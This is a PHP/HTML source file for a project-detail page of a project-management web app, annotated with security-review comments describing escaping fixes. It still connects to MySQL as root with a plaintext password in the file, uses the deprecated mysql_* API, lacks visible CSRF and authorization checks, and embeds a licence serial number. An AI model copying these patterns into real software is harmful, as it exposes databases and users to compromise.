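<?php
	// Page bootstrap: loads the requested project, its project manager and its
	// production manager, then derives the status colour and label that the
	// markup further down prints.
	session_start();

	// SECURITY(review): the database is opened as root with the password written
	// in this web-served file. Keep credentials out of page source and connect
	// with an account limited to what this page needs.
	// NOTE(review): the mysql_* extension is deprecated in PHP 5.5 and has no
	// prepared statements. Until the page is ported to mysqli or PDO, every
	// value placed into SQL in this block is forced to an integer first.
	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("vpa");
	$showAll = "true";

	// projectId comes from the query string and is used both in SQL and in the
	// generated HTML/JavaScript, so it is reduced to an integer at the door.
	$ProjectId = (isset($_GET['projectId']) && is_scalar($_GET['projectId'])) ? (int) $_GET['projectId'] : 0;

	$CompanyId = isset($_SESSION['ASTACUS_SSO_INFO'][4]) ? $_SESSION['ASTACUS_SSO_INFO'][4] : null;

	// Defaults, so an unknown projectId leaves defined (empty) values for the
	// template instead of undefined variables.
	$ProjectName = $Description = $InvoiceText = $createDate = $scheduledDelivery = "";
	$scheduledDeliveryToCustomer = $RequestedDeliveryDate = $Clinet = $OB = "";
	$ProjectStatusId = $ProjectTypeId = $JobTypeId = null;
	$ProductionManagerId = 0;
	$ProjectManagerId = null;
	$ProductionManager = "";

	$sql = "SELECT * FROM Project, ProjectStatus WHERE Project.ProjectStatusId = ProjectStatus.ProjectStatusId and ProjectId = ".$ProjectId;

	$result = mysql_query($sql);

	// NOTE(review): the company id taken from the session is overwritten by the
	// project's own company id, and nothing in this block compares the two.
	// Confirm that the including page checks the user may see this project.
	while ($result && ($row = mysql_fetch_assoc($result))){
		$CompanyId =  $row['CompanyId'];
		$ProjectName =  $row['Name'];
		$Description =  $row['Description'];

		$ProjectStatusId = $row['ProjectStatusId'];
		$InvoiceText = $row['invoiceText'];
		$createDate = substr($row['createDate'],0,10);
		$ProjectTypeId = $row['ProjectTypeId'];
		$scheduledDeliveryToCustomer = $row['scheduledDeliveryToCustomer'];
		$RequestedDeliveryDate= $row['RequestedDeliveryDate'];
		$scheduledDelivery = substr($row['scheduledDelivery'],0,10);
		$JobTypeId = $row['JobTypeId'];
		$Clinet = $row['clientProjectManagerEmail'];
		$OB = $row['orderConfirmationSent'];

		$ProductionManagerId =  $row['SystemUserIdProductionManager'];
	}

	$UserGroupId = isset($_SESSION['ASTACUS_SSO_INFO'][3]) ? $_SESSION['ASTACUS_SSO_INFO'][3] : null;

	$sql = "SELECT * FROM ProjectManager WHERE ProjectId = ".$ProjectId;

	$result = mysql_query($sql);

	while ($result && ($row = mysql_fetch_assoc($result))){
		$ProjectManagerId =  $row['UserId'];
	}

	// The production manager id is read from the database, but it is cast as
	// well so that the statement stays well-formed when no project row matched.
	$sql = "SELECT * FROM SystemUser WHERE SystemUserId = ".(int) $ProductionManagerId;

	$result = mysql_query($sql);

	while ($result && ($row = mysql_fetch_assoc($result))){
		$ProductionManager =  $row['Username'];
	}

	// Map the status id to a swatch colour and a label. The $aNN label
	// variables are not defined in this file (presumably translated strings
	// provided by the including page - confirm).
	switch ($ProjectStatusId) {
		case 18:
			$color = "#FF0000";
			$status = "Skapat av kund";
			break;
		case 1:
			$color = "#ffc600";
			$status = $a33;
			break;
		case 6:
			$color = "#EEEEEE";
			$status = "I Produktion";
			break;
		case 8:
			$color = "#00FF00";
			$status = $a31;
			break;
		case 4:
			$color = "#EEEEEE";
			$status = $a35;
			break;
		case 9:
		case 10:
			$color = "#0099FF";
			$status = $a36;
			break;
		case 14:
			$color = "#9966FF";
			$status = $a32;
			break;
		default:
			$status = $a100;
			$color = "#ffffff";
	}

?>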
<link rel="stylesheet" type="text/css" href="dhtmlxCalendar/codebase/dhtmlxcalendar.css"/>
<script src="dhtmlxCalendar/codebase/dhtmlxcalendar.js"></script>
<link href="../main.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
#calendar_icon {	
	vertical-align: middle;
			cursor: pointer;
}
-->
</style>



<script>


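// Send the date typed into the "deliverydate" field to
// updateDeliveryDateToCustomer.php for the current project.
// delivertoclient is accepted for existing callers and is not used here.
function setDeliveryDate(delivertoclient){

	var d = document.getElementById("deliverydate").value;

	// "page" and the project id are request-derived and land inside a JS string,
	// so they are URL-encoded on the server: the encoded form cannot contain a
	// quote, an angle bracket or a line break. The typed date is encoded in the
	// browser so it cannot add or truncate query parameters.
	location.href = "updateDeliveryDateToCustomer.php?page=<?php echo((isset($_GET['page']) && is_string($_GET['page'])) ? urlencode($_GET['page']) : '');?>&projectId=<?php echo(urlencode($ProjectId));?>&date=" + encodeURIComponent(d);

}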

// Holds the calendar widget once doOnLoad() has run.
var myCalendar;
		// Attach a dhtmlxCalendar to the "deliverydate" input, using the
		// "calendar_icon" element as its button.
		function doOnLoad() {
			var calendarOptions = {
				input: "deliverydate",
				button: "calendar_icon"
			};
			myCalendar = new dhtmlXCalendarObject(calendarOptions);
		}
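<?php

// Show a message passed in the query string as a JavaScript alert.
// The value is request-controlled and is written into a JS string inside a
// script block, so every character that could end the string or the script
// element is escaped first. strtr() works byte-wise, which keeps this correct
// whether the page is served in a single-byte charset or in UTF-8.
if(isset($_GET['showmessage']) && is_string($_GET['showmessage']) && $_GET['showmessage'] != ""){
	$jsMessage = strtr($_GET['showmessage'], array(
		"\\" => "\\\\",
		"'"  => "\\'",
		"\"" => "\\\"",
		"\r" => "\\r",
		"\n" => "\\n",
		"<"  => "\\x3C",
		">"  => "\\x3E",
		"&"  => "\\x26",
	));
echo("alert('".$jsMessage."');");
}

?>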

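// Save the edited project name by navigating to updateProjectName.php.
function updateProjectName(){
	var projectname = document.getElementById("projectname").value;
	// The name is free text: encode it so '&', '#' or '+' cannot add, cut off
	// or alter query parameters. escape() is the encoder createFolder() in this
	// file already uses; it leaves '+' alone, so that is handled separately.
	// NOTE(review): if the page is served as UTF-8, prefer encodeURIComponent.
	var encodedName = escape(projectname).replace(/\+/g, "%2B");
	// The project id is URL-encoded on the server so it cannot close this string.
	location.href = "updateProjectName.php?page=project&projectId=<?php echo(urlencode($ProjectId));?>&name=" + encodedName;

}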
// Invert the checked state of every element named "selectedfiles[]".
function selectAll(){
	var boxes = document.getElementsByName('selectedfiles[]');
	var idx = 0;
	while (idx < boxes.length) {
		var box = boxes[idx];
		box.checked = (box.checked == 1) ? 0 : 1;
		idx += 1;
	}
}
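// Open the edit-user page for the user selected in the "customer" list.
// Option values have the form "projectId#systemUserId".
function edituser(){
			var selObj = document.getElementById("customer");

			// The placeholder option has an empty value: nothing to edit.
			if(selObj.value == ""){
				// Non-ASCII letters are written as \u escapes so the text is
				// shown correctly whatever charset the file is saved or served in.
				alert("Du m\u00e5ste markera en anv\u00e4ndare!");
				return;
			}

			var ids = selObj.value.split("#");
			var ProjectId = ids[0];
			var systemUserId = ids[1];

			// Encode both parts so an unexpected option value cannot add parameters.
			location.href = "?page=user&action=edit&systemUserId="+encodeURIComponent(systemUserId)+"&goto=project&projectId="+encodeURIComponent(ProjectId);
		}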
		
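		// Open a mail draft to the user selected in the "customer" list, with
		// proj as the subject line.
		function mailuser(proj){
			var selObj = document.getElementById("customer");

			if(selObj.value != ""){
				// The subject contains the free-text project name; encode it so
				// '&' or '?' in it is not read as a further mailto field.
				location.href = "mailto:"+selObj.selectedOptions[0].text+"?subject="+encodeURIComponent(proj);
			}else{
				// \u escapes keep the message readable in any file charset.
				alert("Du m\u00e5ste markera en anv\u00e4ndare!");
			}

			}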
		
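		// Ask for a folder name and pass it to createfolder.php together with
		// the current project id and path.
		function createFolder()
    {
        // Declared locally; the bare assignment used before created a global.
        // The prompt text uses a \u escape so it displays in any file charset.
        var stuff = prompt("Ange ett namn p\u00e5 den nya mappen:", "");


		if (stuff) {
		// A commented-out debug line was removed here: PHP inside a JS comment
		// still runs, and it printed the project id into the page unescaped.
		// The project id and path are URL-encoded on the server, so neither can
		// close the string below.
		// NOTE(review): escape() is deprecated; it is kept because it decides the
		// byte encoding createfolder.php receives - confirm the page charset
		// before switching to encodeURIComponent.
             document.location.href="createfolder.php?page=project&projectId=<?php echo(urlencode($ProjectId));?>&path=<?php echo((isset($_GET['path']) && is_string($_GET['path'])) ? urlencode($_GET['path']) : '');?>&foldername=" + escape(stuff);
        }

	}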
	
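	// Ask for confirmation, then navigate to the delete URL passed in as
	// "stuff". Returns true when the user confirmed, otherwise nothing.
	// NOTE(review): the deletion is triggered by a plain GET navigation; confirm
	// that the target script verifies the request (for example a CSRF token).
	function deleteFile(stuff){

			// $language is set outside this file. Emitting it through an int
			// cast guarantees a numeric literal, so the script stays valid and
			// inert whatever the variable holds (0 when it is not set).
			// NOTE(review): assumes language ids are integers, as the
			// comparisons with 2 and 3 suggest.
			var languageId = <?php echo(isset($language) ? (int) $language : 0);?>;

			var question = (languageId == 2 || languageId == 3)
				? "Do you really want to delete the file/folder?"
				: "Vill du verkligen ta bort filen/mappen?";

		if( confirm(question) ){
			 document.location.href= stuff;
			 return true;
		}

		}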
		
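		// Persist a changed drop-down by navigating to updateStatus.php.
		// selObj is the select element; its value has the form
		// "projectId#newValue". id names the field being updated.
		function updateStatus(selObj,id){

		// The current query string is passed along as "params" with every '&'
		// replaced by 'EE' (presumably so updateStatus.php can return to this
		// view - confirm). An address without '?' used to throw here; it now
		// yields an empty string.
		var query = window.location.href.split("?")[1] || "";
		var param = query.replace(/&/g, 'EE');

			var parts = selObj.options[selObj.selectedIndex].value.split("#");
			var ProjectId = parts[0];
			var StatusId = parts[1];

		location.href = "updateStatus.php?projectId="+ProjectId+"&statusId="+StatusId+"&params="+param+"&ID="+id;

}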

</script>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="90">&nbsp;</td>
    <td width="820"><table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td colspan="5" valign="top">          <table width="100%" border="0" cellpadding="0" cellspacing="0">
            <tr >
              <td colspan="4" valign="top" class="text"><span class="heading1"></span>
                <table width="100%" border="0" cellpadding="0" cellspacing="0">
                  <tr valign="top">
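                    <?php /* Heading: company id, editable project name, project id. All three are HTML-escaped before output. The 'ISO-8859-1' argument makes htmlspecialchars() escape byte-wise, so it never blanks a value that is not valid UTF-8; the final false keeps entities already stored in the data from being encoded twice. */ ?>
                    <td><span class="heading3"><?php echo(htmlspecialchars($CompanyId, ENT_QUOTES, 'ISO-8859-1', false));?>_ 
                      
                      <input name="projectname" type="text" class="heading3" id="projectname" value="<?php echo(htmlspecialchars($ProjectName, ENT_QUOTES, 'ISO-8859-1', false));?>" size="30" />
                      (<?php echo(htmlspecialchars($ProjectId, ENT_QUOTES, 'ISO-8859-1'));?>)</span><span class="text">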
                      <input name="button3" type="button" class="heading3" id="button3" value="Save" style="width:75;height:30" onclick="updateProjectName();" />
                      <br />
                      <br>
                      </span><span class="text">                      <br>                    
                        </span>                      <div align="right"><span class="textthin"><br>
                      </span> </div></td>
                    <td align="right"><span class="heading1"><a href="javascript:history.back(-1);"><img src="../images/Back-Arrow.jpg" alt="" width="37" height="36" border="0" align="absmiddle" /></a> <a href="javascript:history.back(-1);" class="blacklinkhuge">Back</a></span></td>
                    </tr>
                  <tr valign="top">
                    <td colspan="2"><table width="100%" height="30" border="0" cellpadding="0" cellspacing="0">
                      <tr>
                        <td width="52" rowspan="2" valign="middle"><table width="45" height="45" border="1" cellpadding="0" cellspacing="0" bordercolor="#000000" class="textthin">
                          <tr>
                            <td bgcolor="<?php /* swatch colour chosen from fixed literals in the status branch earlier in this file */ echo $color; ?>">&nbsp;</td>
                          </tr>
                        </table></td>
                        <td width="168" valign="middle"><select name="status" id="status" onchange="updateStatus(this,'ProjectStatusId');">
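                          <?php
						// Status drop-down: one option per ProjectStatus row that is not
						// hidden. Each value has the form "projectId#statusId".
						$sql = "SELECT * FROM ProjectStatus where Hidden = 0";

						$result2 = mysql_query($sql);
						$was_sel = false;
						while ($result2 && ($row2 = mysql_fetch_assoc($result2))){
							$sel = "";
							if($row2['ProjectStatusId'] == $ProjectStatusId){
								$sel ="selected";
								$was_sel = true;
							}

							// Everything that is not a fixed literal is HTML-escaped.
							// 'ISO-8859-1' makes the escaping byte-wise (no value is
							// blanked for not being valid UTF-8); the final false keeps
							// entities already stored in the label from being doubled.
							echo("<option ".$sel." value='".htmlspecialchars($ProjectId."#".$row2['ProjectStatusId'], ENT_QUOTES, 'ISO-8859-1')."'>".htmlspecialchars($row2['ProjectStatusDisplayValue'], ENT_QUOTES, 'ISO-8859-1', false)."</option>");
						}

						// No listed status matched the project: preselect a placeholder.
						if(!$was_sel){
							echo("<option selected value='1'>V&Auml;LJ</option>");
						}
		?>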
                        </select></td>
                        <td width="313" valign="middle"><span class="style6"> Client:
                            <select name="customer" id="customer" onchange="updateStatus(this,'SystemUserId');">
                            <option value="">Choose</option>
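                            <?php
						// Client drop-down: every SystemUser of the project's company.
						// Each value has the form "projectId#systemUserId".
						// The company id is placed inside a quoted SQL string, so it is
						// escaped for the open connection even though it was read from
						// the database or the session rather than from the request.
						$sql = "SELECT * FROM SystemUser where CompanyId = '".mysql_real_escape_string($CompanyId)."'";

						$result = mysql_query($sql);
						$AstacusPM = "";
						while ($result && ($row = mysql_fetch_assoc($result))){
							$sel = "";
							if($row['Username'] == $Clinet){
								$sel ="selected";
							}

							// HTML-escape the ids and the user name. 'ISO-8859-1' makes the
							// escaping byte-wise; the final false avoids double-encoding
							// entities already present in the stored name.
							echo("<option ".$sel." value='".htmlspecialchars($ProjectId."#".$row['SystemUserId'], ENT_QUOTES, 'ISO-8859-1')."'>".htmlspecialchars($row['Username'], ENT_QUOTES, 'ISO-8859-1', false)."</option>");
						}
		?>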
                          </select>
                          </select>
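                          <?php /* Mail / Edit / Add links. The mail subject used to be written into a JavaScript string inside a javascript: URL inside an attribute, which needs three layers of escaping. It is now carried in a data attribute, which needs HTML escaping only, and handed to mailuser() from there. Ids placed in the Add link are URL-encoded. */ ?>
                          <a href="#" data-subject="<?php echo(htmlspecialchars($CompanyId.'_'.$ProjectName.' ('.$ProjectId.')', ENT_QUOTES, 'ISO-8859-1', false));?>" onclick="mailuser(this.getAttribute('data-subject')); return false;">Mail</a> | <a href="javascript:edituser();">Edit</a> | <a href="?page=user&amp;action=add&amp;projectId=<?php echo(urlencode($ProjectId));?>&amp;goto=project&amp;companyId=<?php echo(urlencode($CompanyId));?>">Add</a></span></td>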
                        <td width="256" valign="middle"><span class="style6"> Type:
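                            <?php /* Job type and order-confirmation selectors. Option values are "projectId#choice"; the project id is HTML-escaped so a crafted id cannot close the attribute. */ ?>
                            <select name="jobtype" id="jobtype" onchange="updateStatus(this,'JobTypeId');">
                            <option value="<?php echo(htmlspecialchars($ProjectId, ENT_QUOTES, 'ISO-8859-1'));?>#1"  <?php if($JobTypeId == "1"){echo("selected");}?>>ORDER</option>
                            <option value="<?php echo(htmlspecialchars($ProjectId, ENT_QUOTES, 'ISO-8859-1'));?>#2"  <?php if($JobTypeId == "2"){echo("selected");}?>>RFQ</option>
                          </select>
                          OB:
                          <select name="jobtype2" id="jobtype2" onchange="updateStatus(this,'orderConfirmationSent');">
                            <option value="<?php echo(htmlspecialchars($ProjectId, ENT_QUOTES, 'ISO-8859-1'));?>#0"  <?php if($OB == "0"){echo("selected");}?>>NO</option>
                            <option value="<?php echo(htmlspecialchars($ProjectId, ENT_QUOTES, 'ISO-8859-1'));?>#1"  <?php if($OB == "1"){echo("selected");}?>>YES</option>
                          </select>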
                        </span></td>
                        <td width="257" align="right" valign="middle" class="style6">Project Type:
                          <select name="type" id="type" onchange="updateStatus(this,'ProjectTypeId');">
                            <option value="0">Choose</option>
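                            <?php
						// Project-type drop-down: ProjectType rows with id 20 or above.
						// Each value has the form "projectId#projectTypeId".
						$sql = "SELECT * FROM ProjectType where ProjectTypeId >=20;";

						$result = mysql_query($sql);

						while ($result && ($row = mysql_fetch_assoc($result))){
							$sel = "";
							if($row['ProjectTypeId'] == $ProjectTypeId){
								$sel ="selected";
							}

							// HTML-escape the ids and the label. 'ISO-8859-1' makes the
							// escaping byte-wise; the final false avoids double-encoding
							// entities already present in the stored label.
							echo("<option ".$sel." value='".htmlspecialchars($ProjectId."#".$row['ProjectTypeId'], ENT_QUOTES, 'ISO-8859-1')."'>".htmlspecialchars($row['ProjectTypeDisplayValue'], ENT_QUOTES, 'ISO-8859-1', false)."</option>");
						}
		?>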
                          </select></td>
                      </tr>
                      <tr>
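                        <?php /* Creation date and production delivery date, each the first ten characters of a stored value; HTML-escaped on output like every other database value on this page. */ ?>
                        <td width="168" valign="middle"><span class="style6">Create date: <?php echo(htmlspecialchars($createDate, ENT_QUOTES, 'ISO-8859-1'));?></span></td>
                        <td width="313" valign="middle"><span class="style6">Delivery from production: <?php echo(htmlspecialchars($scheduledDelivery, ENT_QUOTES, 'ISO-8859-1'));?></span></td>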
                        <td valign="middle"><span class="style6">Delivery date:
                          <?php
						// Choose the text for the delivery-date field: the scheduled
						// customer delivery when one is stored, otherwise the requested
						// date followed by "*" (presumably marking it as not yet
						// confirmed - verify). Only the first ten characters are kept.
						$RDate = $scheduledDeliveryToCustomer;
						if ($RDate == "") {
							$RDate = $RequestedDeliveryDate;
							$d_pr = substr($RDate, 0, 10)."*";
						} else {
							$d_pr = substr($RDate, 0, 10);
						}
						  ?>
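                          <?php /* Delivery-date field and save button. The field value is HTML-escaped. The requested date used to be written into a JavaScript string inside the onclick attribute; it is now carried in a data attribute, which needs HTML escaping only, and passed to setDeliveryDate() from there. */ ?>
                          <input name="deliverydate" type="text" id="deliverydate" size="12" value="<?php echo(htmlspecialchars($d_pr, ENT_QUOTES, 'ISO-8859-1'));?>" />
                          <span><img src="calendar.gif" alt="" id="calendar_icon" border="0" />
                            <input type="button" name="button4" id="button4" value="Spara" data-requested="<?php echo(htmlspecialchars(substr($RequestedDeliveryDate,0,10), ENT_QUOTES, 'ISO-8859-1'));?>" onclick="setDeliveryDate(this.getAttribute('data-requested'));"/>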
                          </span></span></td>
                        <td width="257" align="right" valign="middle" class="style6">Project Manager:
                          <select name="select4" id="select4" onchange="updateStatus(this,'ProjectManagerId');">
                            <option>V&Auml;LJ</option>
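                            <?php
						// Project-manager drop-down: SystemUser rows in user group 5 or 8.
						// Each value has the form "projectId#systemUserId".
						$sql = "SELECT * FROM SystemUser where UserGroupID = 5 or UserGroupID = 8;";

						$result = mysql_query($sql);
						$AstacusPM = "";
						while ($result && ($row = mysql_fetch_assoc($result))){
							$sel = "";
							// $ProjectManagerId is only assigned when the project has a
							// ProjectManager row, hence the isset() guard.
							if(isset($ProjectManagerId) && $row['SystemUserId'] == $ProjectManagerId){
								$sel ="selected";
							}
							// HTML-escape the ids and the user name. 'ISO-8859-1' makes the
							// escaping byte-wise; the final false avoids double-encoding
							// entities already present in the stored name.
							echo("<option ".$sel." value='".htmlspecialchars($ProjectId."#".$row['SystemUserId'], ENT_QUOTES, 'ISO-8859-1')."'>".htmlspecialchars($row['Username'], ENT_QUOTES, 'ISO-8859-1', false)."</option>");
						}
		?>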
                          </select>
                          </select></td>
                      </tr>
                    </table>                      <p>&nbsp;</p></td>
                  </tr>
                </table></td>
            </tr>
          </table>
          <span class="heading2"><br>
          </span>
          <table width="100%" height="100" border="0" cellspacing="0" cellpadding="0">
            <tr>
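              <?php /* Internal-information form. The project id in the action URL is URL-encoded, and the stored text is HTML-escaped so it cannot close the textarea and inject markup. NOTE(review): no anti-CSRF token is visible in this form; confirm updateDescription.php verifies the request origin. */ ?>
              <td width="431" valign="top"><form id="form1" name="form1" method="post" action="updateDescription.php?projectId=<?php echo(urlencode($ProjectId));?>&page=project&type=invoice">
                <span class="style6">Internal information:</span><br />
				  <textarea name="description" id="description" cols="55" rows="6"><?php echo(htmlspecialchars($InvoiceText, ENT_QUOTES, 'ISO-8859-1', false));?></textarea>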
				  <br />
				  <input type="submit" name="button2" id="button2" value="Save" />
				  <span class="heading2"><br>
                  </span><span class="heading2">                </span>
              </form></td>
              <td width="25">&nbsp;</td>
              <td width="575" valign="top"><script type="text/javascript" src="http://download.skype.com/share/skypebuttons/js/skypeCheck.js"></script>
                <table width="600" border="0" align="right" cellpadding="0" cellspacing="0">
                    <tr>
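                      <?php /* Statement-of-work form and the production manager's mail link. Stored text is HTML-escaped before it is written into the textarea, the mailto attribute and the link text; the project id in the action URL is URL-encoded. */ ?>
                      <td align="right"><form id="form1" name="form1" method="post" action="updateDescription.php?projectId=<?php echo(urlencode($ProjectId));?>&page=project&type=regular">
                        <span class="style6"> SoW:</span><br />
                      <textarea name="description" id="description" cols="70" rows="6"><?php echo(htmlspecialchars($Description, ENT_QUOTES, 'ISO-8859-1', false));?></textarea>
                      <br />
                      <input type="submit" name="button" id="button" value="Save" /> 
                      <input name="sendmail" type="checkbox" id="sendmail" value="send" checked="checked" />
                      <span class="style6">Send mail to: </span>
                      <span class="style6"> <a href="mailto:<?php echo(htmlspecialchars($ProductionManager, ENT_QUOTES, 'ISO-8859-1', false));?>?subject=<?php echo(htmlspecialchars($CompanyId.'_'.$ProjectName.' ('.$ProjectId.')', ENT_QUOTES, 'ISO-8859-1', false));?>"><?php echo(htmlspecialchars($ProductionManager, ENT_QUOTES, 'ISO-8859-1', false));?></a></span>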
                      </form></td>
                    </tr>
                  </table></td></tr>
          </table>
          <hr size="1" />

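          <?php /* The path shown here is taken from the query string, so it is HTML-escaped before being written into the page; a missing or non-string value prints nothing. */ ?>
          <p><span class="heading2"><span class="text">Upload files to path <?php echo((isset($_GET['path']) && is_string($_GET['path'])) ? htmlspecialchars($_GET['path'], ENT_QUOTES, 'ISO-8859-1') : '');?></span><br />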
              <applet 
  code="com.elementit.JavaPowUpload.Manager"
  archive="../customerzon/JavaPowUpload/lib/JavaPowUpload.jar, ../customerzon/JavaPowUpload/lib/skinlf.jar,
../customerzon/JavaPowUpload/lib/commons-httpclient.jar"
  width="100%"
  height="400"
  name="JavaPowUpload"
  id="JavaPowUpload"
  mayscript="true"
  alt="JavaPowUpload by www.element-it.com"
  viewastext="VIEWASTEXT">
                <param name="Common.SerialNumber" value="007223217425301132124188251418916727310183" />
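                <?php /* URL the applet opens after an upload. Every dynamic part is URL-encoded, matching the way the upload URL further down already encodes the path; the encoded form cannot close the attribute. */ ?>
                <param name="Common.FinishUrl" value="?page=project&amp;projectId=<?php echo(urlencode($ProjectId));?>&amp;companyId=<?php echo(urlencode($CompanyId));?>&amp;path=<?php echo((isset($_GET['path']) && is_string($_GET['path'])) ? urlencode($_GET['path']) : '');?>&amp;uploaded=true" />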
                <param name="Common.FinishUrl.Target" value="_parent" />
                <!-- Java Plug-In Options -->
                <param name="progressbar" value="true" />
                <param name="boxmessage" value="Loading JavaPowUpload Applet ..." />
                <!--Enable upload mode -->
                <param name="Common.UploadMode" value="true" />
                <param name="Upload.HttpUpload.FieldName.FilePath" value="SelectedPath_#COUNTER#">
                <!--Set url to file processing script -->
            
                
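                      <?php /* Upload target for the applet. The path was already URL-encoded; the project id and company id now are too, and a missing path prints nothing instead of raising a notice. */ ?>
                      <param name="Upload.UploadUrl" value="DirUpload.php?projectId=<?php echo(urlencode($ProjectId));?>&customerId=<?php echo(urlencode($CompanyId));?>&path=<?php echo((isset($_GET['path']) && is_string($_GET['path'])) ? urlencode($_GET['path']) : '');?>">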
          
                <param name="Upload.HttpUpload.MaxFilesCountPerRequest" value="1" />
                <param name="Common.SkinLF.ThemepackURL" value="../customerzon/JavaPowUpload/lib/themepack.zip" />
                <!-- This text will be shown if applet not working or Java not installed-->
                <span style="border:1px  solid #FF0000;display:block;padding:5px;margin-top:10px;margin-bottom:10px;text-align:left; background: #FDF2F2;color:#000;">You should <b>enable applets</b> running at browser and to have the <b>Java</b> (JRE) version &gt;= 1.5.<br />
                  If applet is not displaying properly, please check <a target="_blank" href="http://java.com/en/download/help/testvm.xml" title="Check Java applets">additional configurations</a></span>
              </applet>
          </span><br /> 
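          <?php /* Link to the alternative upload page. The project id and the request-supplied path are URL-encoded so neither can close the href attribute. */ ?>
          <a href="?page=files_new&projectId=<?php echo(urlencode($ProjectId));?>&path=<?php echo((isset($_GET['path']) && is_string($_GET['path'])) ? urlencode($_GET['path']) : '');?>">Try new upload </a></p>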
          <p>&nbsp;</p>
          <p class="style6"><br>
          </p></td>
        </tr>
    </table>      
    </td>
    <td width="90">&nbsp;</td>
  </tr>
  <tr>
    <td colspan="3">&nbsp;    </td>
  </tr>
</table><script>doOnLoad();</script>
